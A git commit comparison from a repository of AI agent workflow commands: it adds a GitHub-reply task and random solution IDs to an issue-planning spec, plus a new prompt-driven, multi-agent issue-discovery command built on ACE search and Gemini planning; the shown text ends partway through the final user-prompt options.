Compare commits
29 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
6305f19bbb | ||
|
|
275d2cb0af | ||
|
|
d5f57d29ed | ||
|
|
7d8b13f34f | ||
|
|
340137d347 | ||
|
|
61cef8019a | ||
|
|
08308aa9ea | ||
|
|
94ae9e264c | ||
|
|
549e6e70e4 | ||
|
|
15514c8f91 | ||
|
|
29c8bb7a66 | ||
|
|
76f5311e78 | ||
|
|
ca6677149a | ||
|
|
880376aefc | ||
|
|
a20f81d44a | ||
|
|
a8627e7f68 | ||
|
|
4caa622942 | ||
|
|
6b8e73bd32 | ||
|
|
68c4c54b64 | ||
|
|
1dca4b06a2 | ||
|
|
a8ec42233f | ||
|
|
49a7c17ba8 | ||
|
|
8a15e08944 | ||
|
|
8c2d39d517 | ||
|
|
bf06f4ddcc | ||
|
|
28645aa4e4 | ||
|
|
cdcb517bc2 | ||
|
|
a63d547856 | ||
|
|
d994274023 |
@@ -138,7 +138,7 @@ Generate multiple candidate solutions when:
|
||||
**Task Decomposition** following schema:
|
||||
```javascript
|
||||
function decomposeTasks(issue, exploration) {
|
||||
return groups.map(group => ({
|
||||
const tasks = groups.map(group => ({
|
||||
id: `T${taskId++}`, // Pattern: ^T[0-9]+$
|
||||
title: group.title,
|
||||
scope: inferScope(group), // Module path
|
||||
@@ -161,7 +161,35 @@ function decomposeTasks(issue, exploration) {
|
||||
},
|
||||
depends_on: inferDependencies(group, tasks),
|
||||
priority: calculatePriority(group) // 1-5 (1=highest)
|
||||
}))
|
||||
}));
|
||||
|
||||
// GitHub Reply Task: Add final task if issue has github_url
|
||||
if (issue.github_url || issue.github_number) {
|
||||
const lastTaskId = tasks[tasks.length - 1]?.id;
|
||||
tasks.push({
|
||||
id: `T${taskId++}`,
|
||||
title: 'Reply to GitHub Issue',
|
||||
scope: 'github',
|
||||
action: 'Notify',
|
||||
description: `Comment on GitHub issue to report completion status`,
|
||||
modification_points: [],
|
||||
implementation: [
|
||||
`Generate completion summary (tasks completed, files changed)`,
|
||||
`Post comment via: gh issue comment ${issue.github_number || extractNumber(issue.github_url)} --body "..."`,
|
||||
`Include: solution approach, key changes, verification results`
|
||||
],
|
||||
test: { unit: [], commands: [] },
|
||||
acceptance: {
|
||||
criteria: ['GitHub comment posted successfully', 'Comment includes completion summary'],
|
||||
verification: ['Check GitHub issue for new comment']
|
||||
},
|
||||
commit: null, // No commit for notification task
|
||||
depends_on: lastTaskId ? [lastTaskId] : [], // Depends on last implementation task
|
||||
priority: 5 // Lowest priority (run last)
|
||||
});
|
||||
}
|
||||
|
||||
return tasks;
|
||||
}
|
||||
```
|
||||
|
||||
@@ -184,14 +212,14 @@ Write solution JSON to JSONL file (one line per solution):
|
||||
|
||||
**File Format** (JSONL - each line is a complete solution):
|
||||
```
|
||||
{"id":"SOL-GH-123-1","description":"...","approach":"...","analysis":{...},"score":0.85,"tasks":[...]}
|
||||
{"id":"SOL-GH-123-2","description":"...","approach":"...","analysis":{...},"score":0.75,"tasks":[...]}
|
||||
{"id":"SOL-GH-123-a7x9","description":"...","approach":"...","analysis":{...},"score":0.85,"tasks":[...]}
|
||||
{"id":"SOL-GH-123-b2k4","description":"...","approach":"...","analysis":{...},"score":0.75,"tasks":[...]}
|
||||
```
|
||||
|
||||
**Solution Schema** (must match CLI `Solution` interface):
|
||||
```typescript
|
||||
{
|
||||
id: string; // Format: SOL-{issue-id}-{N}
|
||||
id: string; // Format: SOL-{issue-id}-{uid}
|
||||
description?: string;
|
||||
approach?: string;
|
||||
tasks: SolutionTask[];
|
||||
@@ -204,9 +232,14 @@ Write solution JSON to JSONL file (one line per solution):
|
||||
**Write Operation**:
|
||||
```javascript
|
||||
// Append solution to JSONL file (one line per solution)
|
||||
const solutionId = `SOL-${issueId}-${seq}`;
|
||||
// Use 4-char random uid to avoid collisions across multiple plan runs
|
||||
const uid = Math.random().toString(36).slice(2, 6); // e.g., "a7x9"
|
||||
const solutionId = `SOL-${issueId}-${uid}`;
|
||||
const solutionLine = JSON.stringify({ id: solutionId, ...solution });
|
||||
|
||||
// Bash equivalent for uid generation:
|
||||
// uid=$(cat /dev/urandom | tr -dc 'a-z0-9' | head -c 4)
|
||||
|
||||
// Read existing, append new line, write back
|
||||
const filePath = `.workflow/issues/solutions/${issueId}.jsonl`;
|
||||
const existing = existsSync(filePath) ? readFileSync(filePath) : '';
|
||||
@@ -283,7 +316,8 @@ Each line is a solution JSON containing tasks. Schema: `cat .claude/workflows/cl
|
||||
6. Evaluate each solution with `analysis` and `score`
|
||||
7. Write solutions to `.workflow/issues/solutions/{issue-id}.jsonl` (append mode)
|
||||
8. For HIGH complexity: generate 2-3 candidate solutions
|
||||
9. **Solution ID format**: `SOL-{issue-id}-{N}` (e.g., `SOL-GH-123-1`, `SOL-GH-123-2`)
|
||||
9. **Solution ID format**: `SOL-{issue-id}-{uid}` where uid is 4 random alphanumeric chars (e.g., `SOL-GH-123-a7x9`)
|
||||
10. **GitHub Reply Task**: If issue has `github_url` or `github_number`, add final task to comment on GitHub issue with completion summary
|
||||
|
||||
**CONFLICT AVOIDANCE** (for batch processing of similar issues):
|
||||
1. **File isolation**: Each issue's solution should target distinct files when possible
|
||||
|
||||
764
.claude/commands/issue/discover-by-prompt.md
Normal file
@@ -0,0 +1,764 @@
|
||||
---
|
||||
name: issue:discover-by-prompt
|
||||
description: Discover issues from user prompt with Gemini-planned iterative multi-agent exploration. Uses ACE semantic search for context gathering and supports cross-module comparison (e.g., frontend vs backend API contracts).
|
||||
argument-hint: "<prompt> [--scope=src/**] [--depth=standard|deep] [--max-iterations=5]"
|
||||
allowed-tools: SlashCommand(*), TodoWrite(*), Read(*), Bash(*), Task(*), AskUserQuestion(*), Glob(*), Grep(*), mcp__ace-tool__search_context(*), mcp__exa__search(*)
|
||||
---
|
||||
|
||||
# Issue Discovery by Prompt
|
||||
|
||||
## Quick Start
|
||||
|
||||
```bash
|
||||
# Discover issues based on user description
|
||||
/issue:discover-by-prompt "Check if frontend API calls match backend implementations"
|
||||
|
||||
# Compare specific modules
|
||||
/issue:discover-by-prompt "Verify auth flow consistency between mobile and web clients" --scope=src/auth/**,src/mobile/**
|
||||
|
||||
# Deep exploration with more iterations
|
||||
/issue:discover-by-prompt "Find all places where error handling is inconsistent" --depth=deep --max-iterations=8
|
||||
|
||||
# Focused backend-frontend contract check
|
||||
/issue:discover-by-prompt "Compare REST API definitions with frontend fetch calls"
|
||||
```
|
||||
|
||||
**Core Difference from `/issue:discover`**:
|
||||
- `discover`: Pre-defined perspectives (bug, security, etc.), parallel execution
|
||||
- `discover-by-prompt`: User-driven prompt, Gemini-planned strategy, iterative exploration
|
||||
|
||||
## What & Why
|
||||
|
||||
### Core Concept
|
||||
|
||||
Prompt-driven issue discovery with intelligent planning. Instead of fixed perspectives, this command:
|
||||
|
||||
1. **Analyzes user intent** via Gemini to understand what to find
|
||||
2. **Plans exploration strategy** dynamically based on codebase structure
|
||||
3. **Executes iterative multi-agent exploration** with feedback loops
|
||||
4. **Performs cross-module comparison** when detecting comparison intent
|
||||
|
||||
### Value Proposition
|
||||
|
||||
1. **Natural Language Input**: Describe what you want to find, not how to find it
|
||||
2. **Intelligent Planning**: Gemini designs optimal exploration strategy
|
||||
3. **Iterative Refinement**: Each round builds on previous discoveries
|
||||
4. **Cross-Module Analysis**: Compare frontend/backend, mobile/web, old/new implementations
|
||||
5. **Adaptive Exploration**: Adjusts direction based on findings
|
||||
|
||||
### Use Cases
|
||||
|
||||
| Scenario | Example Prompt |
|
||||
|----------|----------------|
|
||||
| API Contract | "Check if frontend calls match backend endpoints" |
|
||||
| Error Handling | "Find inconsistent error handling patterns" |
|
||||
| Migration Gap | "Compare old auth with new auth implementation" |
|
||||
| Feature Parity | "Verify mobile has all web features" |
|
||||
| Schema Drift | "Check if TypeScript types match API responses" |
|
||||
| Integration | "Find mismatches between service A and service B" |
|
||||
|
||||
## How It Works
|
||||
|
||||
### Execution Flow
|
||||
|
||||
```
|
||||
Phase 1: Prompt Analysis & Initialization
|
||||
├─ Parse user prompt and flags
|
||||
├─ Detect exploration intent (comparison/search/verification)
|
||||
└─ Initialize discovery session
|
||||
|
||||
Phase 1.5: ACE Context Gathering
|
||||
├─ Use ACE semantic search to understand codebase structure
|
||||
├─ Identify relevant modules based on prompt keywords
|
||||
├─ Collect architecture context for Gemini planning
|
||||
└─ Build initial context package
|
||||
|
||||
Phase 2: Gemini Strategy Planning
|
||||
├─ Feed ACE context + prompt to Gemini CLI
|
||||
├─ Gemini analyzes and generates exploration strategy
|
||||
├─ Create exploration dimensions with search targets
|
||||
├─ Define comparison matrix (if comparison intent)
|
||||
└─ Set success criteria and iteration limits
|
||||
|
||||
Phase 3: Iterative Agent Exploration (with ACE)
|
||||
├─ Iteration 1: Initial exploration by assigned agents
|
||||
│ ├─ Agent A: ACE search + explore dimension 1
|
||||
│ ├─ Agent B: ACE search + explore dimension 2
|
||||
│ └─ Collect findings, update shared context
|
||||
├─ Iteration 2-N: Refined exploration
|
||||
│ ├─ Analyze previous findings
|
||||
│ ├─ ACE search for related code paths
|
||||
│ ├─ Execute targeted exploration
|
||||
│ └─ Update cumulative findings
|
||||
└─ Termination: Max iterations or convergence
|
||||
|
||||
Phase 4: Cross-Analysis & Synthesis
|
||||
├─ Compare findings across dimensions
|
||||
├─ Identify discrepancies and issues
|
||||
├─ Calculate confidence scores
|
||||
└─ Generate issue candidates
|
||||
|
||||
Phase 5: Issue Generation & Summary
|
||||
├─ Convert findings to issue format
|
||||
├─ Write discovery outputs
|
||||
└─ Prompt user for next action
|
||||
```
|
||||
|
||||
### Exploration Dimensions
|
||||
|
||||
Dimensions are **dynamically generated by Gemini** based on the user prompt. Not limited to predefined categories.
|
||||
|
||||
**Examples**:
|
||||
|
||||
| Prompt | Generated Dimensions |
|
||||
|--------|---------------------|
|
||||
| "Check API contracts" | frontend-calls, backend-handlers |
|
||||
| "Find auth issues" | auth-module (single dimension) |
|
||||
| "Compare old/new implementations" | legacy-code, new-code |
|
||||
| "Audit payment flow" | payment-service, validation, logging |
|
||||
| "Find error handling gaps" | error-handlers, error-types, recovery-logic |
|
||||
|
||||
Gemini analyzes the prompt + ACE context to determine:
|
||||
- How many dimensions are needed (1 to N)
|
||||
- What each dimension should focus on
|
||||
- Whether comparison is needed between dimensions
|
||||
|
||||
### Iteration Strategy
|
||||
|
||||
```
|
||||
┌─────────────────────────────────────────────────────────────┐
|
||||
│ Iteration Loop │
|
||||
├─────────────────────────────────────────────────────────────┤
|
||||
│ 1. Plan: What to explore this iteration │
|
||||
│ └─ Based on: previous findings + unexplored areas │
|
||||
│ │
|
||||
│ 2. Execute: Launch agents for this iteration │
|
||||
│ └─ Each agent: explore → collect → return summary │
|
||||
│ │
|
||||
│ 3. Analyze: Process iteration results │
|
||||
│ └─ New findings? Gaps? Contradictions? │
|
||||
│ │
|
||||
│ 4. Decide: Continue or terminate │
|
||||
│ └─ Terminate if: max iterations OR convergence OR │
|
||||
│ high confidence on all questions │
|
||||
└─────────────────────────────────────────────────────────────┘
|
||||
```
|
||||
|
||||
## Core Responsibilities
|
||||
|
||||
### Phase 1: Prompt Analysis & Initialization
|
||||
|
||||
```javascript
|
||||
// Step 1: Parse arguments
|
||||
const { prompt, scope, depth, maxIterations } = parseArgs(args);
|
||||
|
||||
// Step 2: Generate discovery ID
|
||||
const discoveryId = `DBP-${formatDate(new Date(), 'YYYYMMDD-HHmmss')}`;
|
||||
|
||||
// Step 3: Create output directory
|
||||
const outputDir = `.workflow/issues/discoveries/${discoveryId}`;
|
||||
await mkdir(outputDir, { recursive: true });
|
||||
await mkdir(`${outputDir}/iterations`, { recursive: true });
|
||||
|
||||
// Step 4: Detect intent type from prompt
|
||||
const intentType = detectIntent(prompt);
|
||||
// Returns: 'comparison' | 'search' | 'verification' | 'audit'
|
||||
|
||||
// Step 5: Initialize discovery state
|
||||
await writeJson(`${outputDir}/discovery-state.json`, {
|
||||
discovery_id: discoveryId,
|
||||
type: 'prompt-driven',
|
||||
prompt: prompt,
|
||||
intent_type: intentType,
|
||||
scope: scope || '**/*',
|
||||
depth: depth || 'standard',
|
||||
max_iterations: maxIterations || 5,
|
||||
phase: 'initialization',
|
||||
created_at: new Date().toISOString(),
|
||||
iterations: [],
|
||||
cumulative_findings: [],
|
||||
comparison_matrix: null // filled for comparison intent
|
||||
});
|
||||
```
|
||||
|
||||
### Phase 1.5: ACE Context Gathering
|
||||
|
||||
**Purpose**: Use ACE semantic search to gather codebase context before Gemini planning.
|
||||
|
||||
```javascript
|
||||
// Step 1: Extract keywords from prompt for semantic search
|
||||
const keywords = extractKeywords(prompt);
|
||||
// e.g., "frontend API calls match backend" → ["frontend", "API", "backend", "endpoints"]
|
||||
|
||||
// Step 2: Use ACE to understand codebase structure
|
||||
const aceQueries = [
|
||||
`Project architecture and module structure for ${keywords.join(', ')}`,
|
||||
`Where are ${keywords[0]} implementations located?`,
|
||||
`How does ${keywords.slice(0, 2).join(' ')} work in this codebase?`
|
||||
];
|
||||
|
||||
const aceResults = [];
|
||||
for (const query of aceQueries) {
|
||||
const result = await mcp__ace-tool__search_context({
|
||||
project_root_path: process.cwd(),
|
||||
query: query
|
||||
});
|
||||
aceResults.push({ query, result });
|
||||
}
|
||||
|
||||
// Step 3: Build context package for Gemini (kept in memory)
|
||||
const aceContext = {
|
||||
prompt_keywords: keywords,
|
||||
codebase_structure: aceResults[0].result,
|
||||
relevant_modules: aceResults.slice(1).map(r => r.result),
|
||||
detected_patterns: extractPatterns(aceResults)
|
||||
};
|
||||
|
||||
// Step 4: Update state (no separate file)
|
||||
await updateDiscoveryState(outputDir, {
|
||||
phase: 'context-gathered',
|
||||
ace_context: {
|
||||
queries_executed: aceQueries.length,
|
||||
modules_identified: aceContext.relevant_modules.length
|
||||
}
|
||||
});
|
||||
|
||||
// aceContext passed to Phase 2 in memory
|
||||
```
|
||||
|
||||
**ACE Query Strategy by Intent Type**:
|
||||
|
||||
| Intent | ACE Queries |
|
||||
|--------|-------------|
|
||||
| **comparison** | "frontend API calls", "backend API handlers", "API contract definitions" |
|
||||
| **search** | "{keyword} implementations", "{keyword} usage patterns" |
|
||||
| **verification** | "expected behavior for {feature}", "test coverage for {feature}" |
|
||||
| **audit** | "all {category} patterns", "{category} security concerns" |
|
||||
|
||||
### Phase 2: Gemini Strategy Planning
|
||||
|
||||
**Purpose**: Gemini analyzes user prompt + ACE context to design optimal exploration strategy.
|
||||
|
||||
```javascript
|
||||
// Step 1: Load ACE context gathered in Phase 1.5
|
||||
const aceContext = await readJson(`${outputDir}/ace-context.json`);
|
||||
|
||||
// Step 2: Build Gemini planning prompt with ACE context
|
||||
const planningPrompt = `
|
||||
PURPOSE: Analyze discovery prompt and create exploration strategy based on codebase context
|
||||
TASK:
|
||||
• Parse user intent from prompt: "${prompt}"
|
||||
• Use codebase context to identify specific modules and files to explore
|
||||
• Create exploration dimensions with precise search targets
|
||||
• Define comparison matrix structure (if comparison intent)
|
||||
• Set success criteria and iteration strategy
|
||||
MODE: analysis
|
||||
CONTEXT: @${scope || '**/*'} | Discovery type: ${intentType}
|
||||
|
||||
## Codebase Context (from ACE semantic search)
|
||||
${JSON.stringify(aceContext, null, 2)}
|
||||
|
||||
EXPECTED: JSON exploration plan following exploration-plan-schema.json:
|
||||
{
|
||||
"intent_analysis": { "type": "${intentType}", "primary_question": "...", "sub_questions": [...] },
|
||||
"dimensions": [{ "name": "...", "description": "...", "search_targets": [...], "focus_areas": [...], "agent_prompt": "..." }],
|
||||
"comparison_matrix": { "dimension_a": "...", "dimension_b": "...", "comparison_points": [...] },
|
||||
"success_criteria": [...],
|
||||
"estimated_iterations": N,
|
||||
"termination_conditions": [...]
|
||||
}
|
||||
RULES: $(cat ~/.claude/workflows/cli-templates/protocols/analysis-protocol.md) | Use ACE context to inform targets | Focus on actionable plan
|
||||
`;
|
||||
|
||||
// Step 3: Execute Gemini planning
|
||||
Bash({
|
||||
command: `ccw cli -p "${planningPrompt}" --tool gemini --mode analysis`,
|
||||
run_in_background: true,
|
||||
timeout: 300000
|
||||
});
|
||||
|
||||
// Step 4: Parse Gemini output and validate against schema
|
||||
const explorationPlan = await parseGeminiPlanOutput(geminiResult);
|
||||
validateAgainstSchema(explorationPlan, 'exploration-plan-schema.json');
|
||||
|
||||
// Step 5: Enhance plan with ACE-discovered file paths
|
||||
explorationPlan.dimensions = explorationPlan.dimensions.map(dim => ({
|
||||
...dim,
|
||||
ace_suggested_files: aceContext.relevant_modules
|
||||
.filter(m => m.relevance_to === dim.name)
|
||||
.map(m => m.file_path)
|
||||
}));
|
||||
|
||||
// Step 6: Update state (plan kept in memory, not persisted)
|
||||
await updateDiscoveryState(outputDir, {
|
||||
phase: 'planned',
|
||||
exploration_plan: {
|
||||
dimensions_count: explorationPlan.dimensions.length,
|
||||
has_comparison_matrix: !!explorationPlan.comparison_matrix,
|
||||
estimated_iterations: explorationPlan.estimated_iterations
|
||||
}
|
||||
});
|
||||
|
||||
// explorationPlan passed to Phase 3 in memory
|
||||
```
|
||||
|
||||
**Gemini Planning Responsibilities**:
|
||||
|
||||
| Responsibility | Input | Output |
|
||||
|----------------|-------|--------|
|
||||
| Intent Analysis | User prompt | type, primary_question, sub_questions |
|
||||
| Dimension Design | ACE context + prompt | dimensions with search_targets |
|
||||
| Comparison Matrix | Intent type + modules | comparison_points (if applicable) |
|
||||
| Iteration Strategy | Depth setting | estimated_iterations, termination_conditions |
|
||||
|
||||
**Gemini Planning Output Schema**:
|
||||
|
||||
```json
|
||||
{
|
||||
"intent_analysis": {
|
||||
"type": "comparison|search|verification|audit",
|
||||
"primary_question": "string",
|
||||
"sub_questions": ["string"]
|
||||
},
|
||||
"dimensions": [
|
||||
{
|
||||
"name": "frontend",
|
||||
"description": "Client-side API calls and error handling",
|
||||
"search_targets": ["src/api/**", "src/hooks/**"],
|
||||
"focus_areas": ["fetch calls", "error boundaries", "response parsing"],
|
||||
"agent_prompt": "Explore frontend API consumption patterns..."
|
||||
},
|
||||
{
|
||||
"name": "backend",
|
||||
"description": "Server-side API implementations",
|
||||
"search_targets": ["src/server/**", "src/routes/**"],
|
||||
"focus_areas": ["endpoint handlers", "response schemas", "error responses"],
|
||||
"agent_prompt": "Explore backend API implementations..."
|
||||
}
|
||||
],
|
||||
"comparison_matrix": {
|
||||
"dimension_a": "frontend",
|
||||
"dimension_b": "backend",
|
||||
"comparison_points": [
|
||||
{"aspect": "endpoints", "frontend_check": "fetch URLs", "backend_check": "route paths"},
|
||||
{"aspect": "methods", "frontend_check": "HTTP methods used", "backend_check": "methods accepted"},
|
||||
{"aspect": "payloads", "frontend_check": "request body structure", "backend_check": "expected schema"},
|
||||
{"aspect": "responses", "frontend_check": "response parsing", "backend_check": "response format"},
|
||||
{"aspect": "errors", "frontend_check": "error handling", "backend_check": "error responses"}
|
||||
]
|
||||
},
|
||||
"success_criteria": [
|
||||
"All API endpoints mapped between frontend and backend",
|
||||
"Discrepancies identified with file:line references",
|
||||
"Each finding includes remediation suggestion"
|
||||
],
|
||||
"estimated_iterations": 3,
|
||||
"termination_conditions": [
|
||||
"All comparison points verified",
|
||||
"No new findings in last iteration",
|
||||
"Confidence > 0.8 on primary question"
|
||||
]
|
||||
}
|
||||
```
|
||||
|
||||
### Phase 3: Iterative Agent Exploration (with ACE)
|
||||
|
||||
**Purpose**: Multi-agent iterative exploration using ACE for semantic search within each iteration.
|
||||
|
||||
```javascript
|
||||
let iteration = 0;
|
||||
let cumulativeFindings = [];
|
||||
let sharedContext = { aceDiscoveries: [], crossReferences: [] };
|
||||
let shouldContinue = true;
|
||||
|
||||
while (shouldContinue && iteration < maxIterations) {
|
||||
iteration++;
|
||||
const iterationDir = `${outputDir}/iterations/${iteration}`;
|
||||
await mkdir(iterationDir, { recursive: true });
|
||||
|
||||
// Step 1: ACE-assisted iteration planning
|
||||
// Use previous findings to guide ACE queries for this iteration
|
||||
const iterationAceQueries = iteration === 1
|
||||
? explorationPlan.dimensions.map(d => d.focus_areas[0]) // Initial queries from plan
|
||||
: deriveQueriesFromFindings(cumulativeFindings); // Follow-up queries from findings
|
||||
|
||||
// Execute ACE searches to find related code
|
||||
const iterationAceResults = [];
|
||||
for (const query of iterationAceQueries) {
|
||||
const result = await mcp__ace-tool__search_context({
|
||||
project_root_path: process.cwd(),
|
||||
query: `${query} in ${explorationPlan.scope}`
|
||||
});
|
||||
iterationAceResults.push({ query, result });
|
||||
}
|
||||
|
||||
// Update shared context with ACE discoveries
|
||||
sharedContext.aceDiscoveries.push(...iterationAceResults);
|
||||
|
||||
// Step 2: Plan this iteration based on ACE results
|
||||
const iterationPlan = planIteration(iteration, explorationPlan, cumulativeFindings, iterationAceResults);
|
||||
|
||||
// Step 3: Launch dimension agents with ACE context
|
||||
const agentPromises = iterationPlan.dimensions.map(dimension =>
|
||||
Task({
|
||||
subagent_type: "cli-explore-agent",
|
||||
run_in_background: false,
|
||||
description: `Explore ${dimension.name} (iteration ${iteration})`,
|
||||
prompt: buildDimensionPromptWithACE(dimension, iteration, cumulativeFindings, iterationAceResults, iterationDir)
|
||||
})
|
||||
);
|
||||
|
||||
// Wait for iteration agents
|
||||
const iterationResults = await Promise.all(agentPromises);
|
||||
|
||||
// Step 4: Collect and analyze iteration findings
|
||||
const iterationFindings = await collectIterationFindings(iterationDir, iterationPlan.dimensions);
|
||||
|
||||
// Step 5: Cross-reference findings between dimensions
|
||||
if (iterationPlan.dimensions.length > 1) {
|
||||
const crossRefs = findCrossReferences(iterationFindings, iterationPlan.dimensions);
|
||||
sharedContext.crossReferences.push(...crossRefs);
|
||||
}
|
||||
|
||||
cumulativeFindings.push(...iterationFindings);
|
||||
|
||||
// Step 6: Decide whether to continue
|
||||
const convergenceCheck = checkConvergence(iterationFindings, cumulativeFindings, explorationPlan);
|
||||
shouldContinue = !convergenceCheck.converged;
|
||||
|
||||
// Step 7: Update state (iteration summary embedded in state)
|
||||
await updateDiscoveryState(outputDir, {
|
||||
iterations: [...state.iterations, {
|
||||
number: iteration,
|
||||
findings_count: iterationFindings.length,
|
||||
ace_queries: iterationAceQueries.length,
|
||||
cross_references: sharedContext.crossReferences.length,
|
||||
new_discoveries: convergenceCheck.newDiscoveries,
|
||||
confidence: convergenceCheck.confidence,
|
||||
continued: shouldContinue
|
||||
}],
|
||||
cumulative_findings: cumulativeFindings
|
||||
});
|
||||
}
|
||||
```
|
||||
|
||||
**ACE in Iteration Loop**:
|
||||
|
||||
```
|
||||
Iteration N
|
||||
│
|
||||
├─→ ACE Search (based on previous findings)
|
||||
│ └─ Query: "related code paths for {finding.category}"
|
||||
│ └─ Result: Additional files to explore
|
||||
│
|
||||
├─→ Agent Exploration (with ACE context)
|
||||
│ └─ Agent receives: dimension targets + ACE suggestions
|
||||
│ └─ Agent can call ACE for deeper search
|
||||
│
|
||||
├─→ Cross-Reference Analysis
|
||||
│ └─ Compare findings between dimensions
|
||||
│ └─ Identify discrepancies
|
||||
│
|
||||
└─→ Convergence Check
|
||||
└─ New findings? Continue
|
||||
└─ No new findings? Terminate
|
||||
```
|
||||
|
||||
**Dimension Agent Prompt Template (with ACE)**:
|
||||
|
||||
```javascript
|
||||
function buildDimensionPromptWithACE(dimension, iteration, previousFindings, aceResults, outputDir) {
|
||||
// Filter ACE results relevant to this dimension
|
||||
const relevantAceResults = aceResults.filter(r =>
|
||||
r.query.includes(dimension.name) || dimension.focus_areas.some(fa => r.query.includes(fa))
|
||||
);
|
||||
|
||||
return `
|
||||
## Task Objective
|
||||
Explore ${dimension.name} dimension for issue discovery (Iteration ${iteration})
|
||||
|
||||
## Context
|
||||
- Dimension: ${dimension.name}
|
||||
- Description: ${dimension.description}
|
||||
- Search Targets: ${dimension.search_targets.join(', ')}
|
||||
- Focus Areas: ${dimension.focus_areas.join(', ')}
|
||||
|
||||
## ACE Semantic Search Results (Pre-gathered)
|
||||
The following files/code sections were identified by ACE as relevant to this dimension:
|
||||
${JSON.stringify(relevantAceResults.map(r => ({ query: r.query, files: r.result.slice(0, 5) })), null, 2)}
|
||||
|
||||
**Use ACE for deeper exploration**: You have access to mcp__ace-tool__search_context.
|
||||
When you find something interesting, use ACE to find related code:
|
||||
- mcp__ace-tool__search_context({ project_root_path: ".", query: "related to {finding}" })
|
||||
|
||||
${iteration > 1 ? `
|
||||
## Previous Findings to Build Upon
|
||||
${summarizePreviousFindings(previousFindings, dimension.name)}
|
||||
|
||||
## This Iteration Focus
|
||||
- Explore areas not yet covered (check ACE results for new files)
|
||||
- Verify/deepen previous findings
|
||||
- Follow leads from previous discoveries
|
||||
- Use ACE to find cross-references between dimensions
|
||||
` : ''}
|
||||
|
||||
## MANDATORY FIRST STEPS
|
||||
1. Read exploration plan: ${outputDir}/../exploration-plan.json
|
||||
2. Read schema: ~/.claude/workflows/cli-templates/schemas/discovery-finding-schema.json
|
||||
3. Review ACE results above for starting points
|
||||
4. Explore files identified by ACE
|
||||
|
||||
## Exploration Instructions
|
||||
${dimension.agent_prompt}
|
||||
|
||||
## ACE Usage Guidelines
|
||||
- Use ACE when you need to find:
|
||||
- Where a function/class is used
|
||||
- Related implementations in other modules
|
||||
- Cross-module dependencies
|
||||
- Similar patterns elsewhere in codebase
|
||||
- Query format: Natural language, be specific
|
||||
- Example: "Where is UserService.authenticate called from?"
|
||||
|
||||
## Output Requirements
|
||||
|
||||
**1. Write JSON file**: ${outputDir}/${dimension.name}.json
|
||||
Follow discovery-finding-schema.json:
|
||||
- findings: [{id, title, category, description, file, line, snippet, confidence, related_dimension}]
|
||||
- coverage: {files_explored, areas_covered, areas_remaining}
|
||||
- leads: [{description, suggested_search}] // for next iteration
|
||||
- ace_queries_used: [{query, result_count}] // track ACE usage
|
||||
|
||||
**2. Return summary**:
|
||||
- Total findings this iteration
|
||||
- Key discoveries
|
||||
- ACE queries that revealed important code
|
||||
- Recommended next exploration areas
|
||||
|
||||
## Success Criteria
|
||||
- [ ] JSON written to ${outputDir}/${dimension.name}.json
|
||||
- [ ] Each finding has file:line reference
|
||||
- [ ] ACE used for cross-references where applicable
|
||||
- [ ] Coverage report included
|
||||
- [ ] Leads for next iteration identified
|
||||
`;
|
||||
}
|
||||
```
|
||||
|
||||
### Phase 4: Cross-Analysis & Synthesis
|
||||
|
||||
```javascript
|
||||
// For comparison intent, perform cross-analysis
|
||||
if (intentType === 'comparison' && explorationPlan.comparison_matrix) {
|
||||
const comparisonResults = [];
|
||||
|
||||
for (const point of explorationPlan.comparison_matrix.comparison_points) {
|
||||
const dimensionAFindings = cumulativeFindings.filter(f =>
|
||||
f.related_dimension === explorationPlan.comparison_matrix.dimension_a &&
|
||||
f.category.includes(point.aspect)
|
||||
);
|
||||
|
||||
const dimensionBFindings = cumulativeFindings.filter(f =>
|
||||
f.related_dimension === explorationPlan.comparison_matrix.dimension_b &&
|
||||
f.category.includes(point.aspect)
|
||||
);
|
||||
|
||||
// Compare and find discrepancies
|
||||
const discrepancies = findDiscrepancies(dimensionAFindings, dimensionBFindings, point);
|
||||
|
||||
comparisonResults.push({
|
||||
aspect: point.aspect,
|
||||
dimension_a_count: dimensionAFindings.length,
|
||||
dimension_b_count: dimensionBFindings.length,
|
||||
discrepancies: discrepancies,
|
||||
match_rate: calculateMatchRate(dimensionAFindings, dimensionBFindings)
|
||||
});
|
||||
}
|
||||
|
||||
// Write comparison analysis
|
||||
await writeJson(`${outputDir}/comparison-analysis.json`, {
|
||||
matrix: explorationPlan.comparison_matrix,
|
||||
results: comparisonResults,
|
||||
summary: {
|
||||
total_discrepancies: comparisonResults.reduce((sum, r) => sum + r.discrepancies.length, 0),
|
||||
overall_match_rate: average(comparisonResults.map(r => r.match_rate)),
|
||||
critical_mismatches: comparisonResults.filter(r => r.match_rate < 0.5)
|
||||
}
|
||||
});
|
||||
}
|
||||
|
||||
// Prioritize all findings
|
||||
const prioritizedFindings = prioritizeFindings(cumulativeFindings, explorationPlan);
|
||||
```
|
||||
|
||||
### Phase 5: Issue Generation & Summary
|
||||
|
||||
```javascript
|
||||
// Convert high-confidence findings to issues
|
||||
const issueWorthy = prioritizedFindings.filter(f =>
|
||||
f.confidence >= 0.7 || f.priority === 'critical' || f.priority === 'high'
|
||||
);
|
||||
|
||||
const issues = issueWorthy.map(finding => ({
|
||||
id: `ISS-${discoveryId}-${finding.id}`,
|
||||
title: finding.title,
|
||||
description: finding.description,
|
||||
source: {
|
||||
discovery_id: discoveryId,
|
||||
finding_id: finding.id,
|
||||
dimension: finding.related_dimension
|
||||
},
|
||||
file: finding.file,
|
||||
line: finding.line,
|
||||
priority: finding.priority,
|
||||
category: finding.category,
|
||||
suggested_fix: finding.suggested_fix,
|
||||
confidence: finding.confidence,
|
||||
status: 'discovered',
|
||||
created_at: new Date().toISOString()
|
||||
}));
|
||||
|
||||
// Write issues
|
||||
await writeJsonl(`${outputDir}/discovery-issues.jsonl`, issues);
|
||||
|
||||
// Update final state (summary embedded in state, no separate file)
|
||||
await updateDiscoveryState(outputDir, {
|
||||
phase: 'complete',
|
||||
updated_at: new Date().toISOString(),
|
||||
results: {
|
||||
total_iterations: iteration,
|
||||
total_findings: cumulativeFindings.length,
|
||||
issues_generated: issues.length,
|
||||
comparison_match_rate: comparisonResults
|
||||
? average(comparisonResults.map(r => r.match_rate))
|
||||
: null
|
||||
}
|
||||
});
|
||||
|
||||
// Prompt user for next action
|
||||
await AskUserQuestion({
|
||||
questions: [{
|
||||
question: `Discovery complete: ${issues.length} issues from ${cumulativeFindings.length} findings across ${iteration} iterations. What next?`,
|
||||
header: "Next Step",
|
||||
multiSelect: false,
|
||||
options: [
|
||||
